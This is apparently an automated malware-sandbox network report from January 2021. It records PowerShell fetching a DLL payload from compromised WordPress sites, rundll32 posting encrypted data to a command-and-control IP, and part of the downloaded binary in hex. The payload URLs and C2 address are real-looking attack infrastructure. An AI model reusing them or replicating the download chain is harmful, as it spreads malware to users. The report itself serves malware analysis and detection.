                                              Jan 7, 2021 18:44:34.579128981 CET4917180192.168.2.22210.86.239.69
                                              Jan 7, 2021 18:44:34.579134941 CET4917180192.168.2.22210.86.239.69
                                              Jan 7, 2021 18:44:34.579139948 CET4917180192.168.2.22210.86.239.69
                                              Jan 7, 2021 18:44:34.579806089 CET4917180192.168.2.22210.86.239.69
                                              Jan 7, 2021 18:44:34.843252897 CET8049171210.86.239.69192.168.2.22
                                              Jan 7, 2021 18:44:34.843312979 CET8049171210.86.239.69192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 7, 2021 18:44:30.075944901 CET5219753192.168.2.228.8.8.8
                                              Jan 7, 2021 18:44:30.135895967 CET53521978.8.8.8192.168.2.22
                                              Jan 7, 2021 18:44:30.376312971 CET5309953192.168.2.228.8.8.8
                                              Jan 7, 2021 18:44:30.447573900 CET53530998.8.8.8192.168.2.22
                                              Jan 7, 2021 18:44:30.576024055 CET5283853192.168.2.228.8.8.8
                                              Jan 7, 2021 18:44:30.742572069 CET53528388.8.8.8192.168.2.22
                                              Jan 7, 2021 18:44:31.077896118 CET6120053192.168.2.228.8.8.8
                                              Jan 7, 2021 18:44:31.439886093 CET53612008.8.8.8192.168.2.22
                                              Jan 7, 2021 18:44:32.096111059 CET4954853192.168.2.228.8.8.8
                                              Jan 7, 2021 18:44:32.459737062 CET53495488.8.8.8192.168.2.22
                                              Jan 7, 2021 18:44:33.738118887 CET5562753192.168.2.228.8.8.8
                                              Jan 7, 2021 18:44:34.039865017 CET53556278.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 7, 2021 18:44:30.075944901 CET192.168.2.228.8.8.80x315eStandard query (0)wpsapk.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:30.376312971 CET192.168.2.228.8.8.80x8df5Standard query (0)sofsuite.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:30.576024055 CET192.168.2.228.8.8.80x7e45Standard query (0)veterinariadrpopui.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:31.077896118 CET192.168.2.228.8.8.80x6029Standard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:32.096111059 CET192.168.2.228.8.8.80x1168Standard query (0)shop.elemenslide.comA (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:33.738118887 CET192.168.2.228.8.8.80x8c10Standard query (0)khanhhoahomnay.netA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 7, 2021 18:44:30.135895967 CET8.8.8.8192.168.2.220x315eNo error (0)wpsapk.com172.67.141.14A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:30.135895967 CET8.8.8.8192.168.2.220x315eNo error (0)wpsapk.com104.18.61.59A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:30.135895967 CET8.8.8.8192.168.2.220x315eNo error (0)wpsapk.com104.18.60.59A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:30.447573900 CET8.8.8.8192.168.2.220x8df5No error (0)sofsuite.com172.67.158.72A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:30.447573900 CET8.8.8.8192.168.2.220x8df5No error (0)sofsuite.com104.27.144.251A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:30.447573900 CET8.8.8.8192.168.2.220x8df5No error (0)sofsuite.com104.27.145.251A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:30.742572069 CET8.8.8.8192.168.2.220x7e45No error (0)veterinariadrpopui.com209.59.139.39A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:31.439886093 CET8.8.8.8192.168.2.220x6029No error (0)shop.elemenslide.com45.130.229.91A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:32.459737062 CET8.8.8.8192.168.2.220x1168No error (0)shop.elemenslide.com45.130.229.91A (IP address)IN (0x0001)
                                              Jan 7, 2021 18:44:34.039865017 CET8.8.8.8192.168.2.220x8c10No error (0)khanhhoahomnay.net210.86.239.69A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • wpsapk.com
                                              • sofsuite.com
                                              • veterinariadrpopui.com
                                              • shop.elemenslide.com
                                              • khanhhoahomnay.net
                                              • 5.2.136.90

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249165172.67.141.1480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 18:44:30.203901052 CET0OUTGET /wp-admin/v/ HTTP/1.1
                                              Host: wpsapk.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:30.344028950 CET1INHTTP/1.1 503 Service Temporarily Unavailable
                                              Date: Thu, 07 Jan 2021 17:44:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Set-Cookie: __cfduid=d8b7506db4f74314ae3b57f6dbe6ac1c31610041470; expires=Sat, 06-Feb-21 17:44:30 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax
                                              X-Frame-Options: SAMEORIGIN
                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                              cf-request-id: 077f8c452100000c01080e2000000001
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8lqtZejLfOVamkn%2BPl6hy5XFK4AXo4i%2FCBAfR597ZJF%2FYROmB8JlivN9ChBG46FvwWvrvHz2D5Aw%2B35S9bfu%2FOGgNQZVyqvwo%2Bic"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 60df7cb4fe450c01-AMS
                                              Data Raw: 32 30 31 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 7d 0a 20 20 20 20 62
                                              Data Ascii: 2018<!DOCTYPE HTML><html lang="en-US"><head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <title>Just a moment...</title> <style type="text/css"> html, body {width: 100%; height: 100%; margin: 0; padding: 0;} b


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249166172.67.158.7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 18:44:30.495342970 CET10OUTGET /wp-includes/2jm3nIk/ HTTP/1.1
                                              Host: sofsuite.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:30.559907913 CET12INHTTP/1.1 200 OK
                                              Date: Thu, 07 Jan 2021 17:44:30 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Set-Cookie: __cfduid=d01a5316175caa3b723e115a9e178dbb51610041470; expires=Sat, 06-Feb-21 17:44:30 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax
                                              X-Frame-Options: SAMEORIGIN
                                              cf-request-id: 077f8c464300000c79aab30000000001
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MIFsTKo1m7OxHsT5HW3d0aKz%2BsoPrwOhej7TTyXhcLuVAd9NqBemOjCMPV0m1TGhoqhnMr%2BN7N8a3U2XEII28eGe8vOrlMZcZjZWsCY%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 60df7cb6dfe70c79-AMS
                                              Data Raw: 31 30 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d
                                              Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.2249167209.59.139.3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 18:44:30.904099941 CET16OUTGET /content/5f18Q/ HTTP/1.1
                                              Host: veterinariadrpopui.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:31.065102100 CET18INHTTP/1.1 500 Internal Server Error
                                              Date: Thu, 07 Jan 2021 17:44:30 GMT
                                              Server: Apache
                                              Content-Length: 7309
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 35 30 39 20 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 6e 64 77 69 64 74 68 20 4c 69 6d 69 74 20 45 78 63 65 65 64 65 64 3c 2f 48 31 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 0a 20 20
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.224916845.130.229.9180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 18:44:31.765779018 CET25OUTGET /wp-content/n/ HTTP/1.1
                                              Host: shop.elemenslide.com
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:32.090152979 CET25INHTTP/1.1 301 Moved Permanently
                                              Date: Thu, 07 Jan 2021 17:44:31 GMT
                                              Server: Apache
                                              Location: https://shop.elemenslide.com/wp-content/n/
                                              Content-Length: 250
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 68 6f 70 2e 65 6c 65 6d 65 6e 73 6c 69 64 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://shop.elemenslide.com/wp-content/n/">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.2249171210.86.239.6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 18:44:34.306168079 CET27OUTGET /wordpress/CGMC/ HTTP/1.1
                                              Host: khanhhoahomnay.net
                                              Connection: Keep-Alive
                                              Jan 7, 2021 18:44:34.578701019 CET29INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 07 Jan 2021 17:44:34 GMT
                                              Content-Type: application/octet-stream
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60
                                              X-Powered-By: PHP/7.4.9
                                              Set-Cookie: 5ff74882c21e8=1610041474; expires=Thu, 07-Jan-2021 17:45:34 GMT; Max-Age=60; path=/
                                              Cache-Control: no-cache, must-revalidate
                                              Pragma: no-cache
                                              Last-Modified: Thu, 07 Jan 2021 17:44:34 GMT
                                              Expires: Thu, 07 Jan 2021 17:44:34 GMT
                                              Content-Disposition: attachment; filename="lVckIxaBMeiUca.dll"
                                              Content-Transfer-Encoding: binary
                                              Data Raw: 31 64 64 31 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 1dd1MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.22491725.2.136.9080C:\Windows\SysWOW64\rundll32.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 7, 2021 18:44:47.033138990 CET228OUTPOST /kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/ HTTP/1.1
                                              DNT: 0
                                              Referer: 5.2.136.90/kgyzxpwz2xbv77ogr/hwc124a/tlainblv97xym5/vprvaz88294j9p025s/
                                              Content-Type: multipart/form-data; boundary=---------------------QoJn3cDxG8j9ficgc6HWz
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 5.2.136.90
                                              Content-Length: 8068
                                              Connection: Keep-Alive
                                              Cache-Control: no-cache
                                              Jan 7, 2021 18:44:47.754265070 CET238INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Thu, 07 Jan 2021 17:44:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: keep-alive
                                              Vary: Accept-Encoding
                                              Data Raw: 35 38 34 0d 0a 72 bb cb ed 47 2e d6 a8 b1 22 09 67 d7 c6 5d 81 d5 f1 1d 88 ee e5 e9 d7 ee 5d 1f 5f 93 20 bd d1 6d 3e 7b c4 9c ed a0 ce 0a 7e ef 0d df 57 75 7e 96 12 f0 08 64 8e a3 e3 80 c4 d9 3e d2 48 c1 bc eb 74 7d b8 1c c9 e9 f6 48 26 76 83 47 1c 7c 16 4a 54 d4 7b 2b 32 ba 23 6b 71 84 48 4e 1f d7 d5 11 93 88 82 f7 b0 8c 94 1a 75 7c 13 42 1e c7 ad 5e 28 b6 9a 76 84 04 bf 8d 92 b9 60 98 1c 21 2f 35 ec c2 d8 c7 0a 49 a2 4a ba fe 04 da af 5e c8 96 b9 ec 1b c2 2c 7a cf c3 d7 5b 60 cf 00 14 c7 aa cc 6b 3a f0 2d d5 44 1d 58 fd 69 c5 95 44 19 c5 dc 8a bb 0c 81 ad 2f ce fa f9 53 33 70 a3 63 c5 9e 32 ea df 29 1e a5 08 9a c5 e4 a6 53 f8 06 d3 32 41 77 be 93 41 20 c3 ca 1c b3 a5 62 b0 d9 fc ae 3e 39 1a c0 b5 28 e4 ac 6b 6d d6 94 39 67 d5 64 c5 10 0a b5 a8 44 46 60 06 cf eb c6 1d c0 8f 02 50 04 60 bb ee 52 2f 4b 78 6c 04 a3 6d d2 e4 f1 c6 38 fc ff d1 2d b6 d4 6b 82 6d 2b fb a9 8e 7c d5 d4 e5 af 66 30 9e 0a 73 2e dc f6 8d 07 98 de e8 b5 ec 1f ad 89 eb 39 5a 9f b7 32 5b 23 d6 99 c8 70 b4 8f 9d 8a e3 53 61 87 48 66 c8 cd 3b 67 78 b4 73 90 da 01 63 91 8c c3 d2 24 d5 93 90 8d 76 77 2d bf 7e c6 7a fd 8e e3 65 b8 ab b5 84 9e 09 07 21 97 7d 45 8d f5 0a eb 03 8d fe e5 f7 ac 69 75 f2 cb de e8 